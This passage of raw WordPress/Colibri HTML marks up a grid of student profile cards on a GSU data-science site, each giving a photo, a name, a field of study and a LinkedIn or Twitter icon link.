<!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c143-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c143-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-global-transition-all h-heading style-914 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c144\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"h-text h-text-component style-915 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c146\" class=\"style-919 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c147-outer\">\n            <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c147 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c148\" class=\"d-block style-920 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c148-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c148-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"h-global-transition-all h-heading style-914 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c149\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c150\" class=\"h-text h-text-component style-915 style-local-182-c150 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c151\" class=\"style-921 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c152-outer\">\n            <div data-colibri-id=\"182-c152\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c152 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c153\" class=\"d-block style-922 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c153-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c153-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"h-global-transition-all h-heading style-914 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c154\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"h-text h-text-component style-915 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c156\" class=\"style-923 style-local-182-c156 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c157-outer\">\n            <div data-colibri-id=\"182-c157\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c157 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c158\" class=\"d-block style-913 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c158-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c158-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c159\" class=\"h-global-transition-all h-heading style-914 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c159\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"h-text h-text-component style-915 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c161\" class=\"style-917 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c162-outer\">\n            <div data-colibri-id=\"182-c162\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c162 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c163\" class=\"d-block style-913 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c163-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c163-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"h-global-transition-all h-heading style-914 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c164\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"h-text h-text-component style-915 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c166\" class=\"style-917 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c167-outer\">\n            <div data-colibri-id=\"182-c167\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c167 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c168\" class=\"d-block style-913 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c168-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c168-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-global-transition-all h-heading style-914 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c169\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"h-text h-text-component style-915 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c171\" class=\"style-917 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c172-outer\">\n            <div data-colibri-id=\"182-c172\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c172 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c173\" class=\"d-block style-913 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c173-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c173-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-global-transition-all h-heading style-914 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c174\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"h-text h-text-component style-915 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-913 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-917 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 